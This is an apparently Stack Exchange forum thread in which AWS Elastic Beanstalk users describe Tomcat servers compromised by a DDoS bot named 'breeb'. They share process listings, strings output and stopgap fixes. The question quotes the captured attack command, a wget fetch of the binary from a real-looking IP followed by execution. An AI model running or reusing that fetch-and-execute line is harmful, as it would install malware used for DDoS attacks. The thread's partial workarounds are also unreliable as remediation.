# AWS EBS Tomcat instance being hacked

Tags: security, amazon-aws, tomcat

I'm using AWS EBS instances with tomcat for my java web application. But somehow some guy manages to hack into my instances and all I can see are these processes being ran by tomcat:

```
tomcat   26988  0.2  0.1 180304  2972 ?        S    11:18   0:00 wget http://220.133.87.149:49120/breeb
tomcat    1898  0.0  0.0  75252   736 ?        Ssl  11:18   0:00 ./breeb
```

These process send out lots of random packets (in TBs) within minutes. The IP(http://220.133.87.149:49120/) from where these malicious files are being downloaded contains many other malicious files.

[image: The site containing malicious files]
Does anyone have any idea, what am I dealing with? Below are my security settings for AWS instances:

**Inbound:**

```
80  tcp 0.0.0.0/0
22  tcp 0.0.0.0/0
```

**Outbound:**

```
 All traffic   All Protocol  All IPs
```

Comment: See [How Do I Deal With a Compromised Server, at serverfault.com](http://serverfault.com/questions/218005/how-do-i-deal-with-a-compromised-server).

Comment: Such questions are off topic here. System and network administration -- Server Fault participants are much more likely to know the technical details on topics such as DNS and Apache configuration than people who answer questions here.

Comment: Questions on **professional server, networking, or related infrastructure administration** are off-topic for Pro Webmasters. You may be able to get help on [sf]. As your question is currently written it *probably* would not meet that site's quality guidelines. I recommend reading their [FAQ](http://serverfault.com/about) to ensure your question is appropriate for their site.

Answer (score 2):

*** THREAD TAKEN TO AWS FORUMS ***

http://forums.aws.amazon.com/thread.jspa?threadID=227061&tstart=0

*** THREAD TAKEN TO AWS FORUMS ***

I had the same problem last week:

My amazon server was somehow compromised. I received an abuse report from amazon stating my server was being used in a DDOS attack on a website.

When I logged in I found an application /usr/share/tomcat7/breeb was running in memory. I expect there is a weakness in tomcat 7 which means a remote user is able to upload a spam client to my server and execute it as the tomcat user. Very worrying.

Looks to me like the ‘breeb’ application is written in c++ and has the following footprint

```
-rwxrwxrwx  1 tomcat tomcat 1223123 Nov  7 23:54 breeb
-rw-r--r--  1 tomcat tomcat 1223123 Nov  7 23:54 breeb.1
-rw-r--r--  1 tomcat tomcat 1223123 Nov  7 23:54 breeb.2
-rw-r--r--  1 tomcat tomcat 1223123 Nov  7 23:54 breeb.3
```

Some of the c++ classes are a bit of a giveaway:

```
[ec2-user tmp]$ strings breeb | grep .cpp
AmpResource.cpp
Attack.cpp
CmdMsg.cpp
ConfigDoing.cpp
DNSCache.cpp
ExChange.cpp
Global.cpp
Main.cpp
ThreadDoFun.cpp
...
```

Googling "linux backdoor 1223123" which is the bytesize of the spam client, brings up a lot of virus alerts.

Other ‘strings’ in the compiled breeb application include a large list of IP addresses, they are all Chinese and feature in a lot of malware reports.

Cant seem to get any recognition of this issue on any of the forums, I've since rebuilt the server but with tomcat8 and been running for a few days without problems... Would be nice to know what the attack vector was.

Comment: this is exactly what is happening to me, please keep me updated if tomcat8 still is working for you. Currently I've written a script which gets invoked every 10 secs and scans for anything malicious and kills it and it's working for me. but not a good solution as anything can happen in those 10 secs.

Comment: Tomcat 8 still running fine, no return of breeb

Comment: Well sadly the problem has come back even with tomcat 8, it's not called breeb this time but gccaa.

-rwxrwxrwx  1 tomcat tomcat 1223123 Oct 25 03:16 gccaa
As you can see the DDOS client has the same byte size.

Got another Amazon AWS abuse warning me that my server is being used in a DDOS attack. I've had to take the web site down until I can find out how to stop it. Any ideas would be most welcome...

Comment: I'm facing the same issue, In fact I upgraded to T8 after you suggested. You can try my solution till then (Although not efficient, but it's working for me for past 1 year, and I don't have to take down my site :) ) 
https://github.com/thelakshya/AWS-ElastickBeanStalk.

Let me know if it solved your issues.

Comment: I tried to add more useful information but John Conde deleted it becuase "it was not an answer". More important to keep the thread tidy rather than try and find a solution. Anyhow I created a post on the AWS forums - I'll continue with this thread there and let John Conde have a nice tidy thread.

Comment: https://forums.aws.amazon.com/thread.jspa?threadID=227061&tstart=0

Comment: OK I updated the answer to link to AWS forums, only you can update the question

Comment: can you UPVOTE (not update) the question, so that it will get noticed by others as well?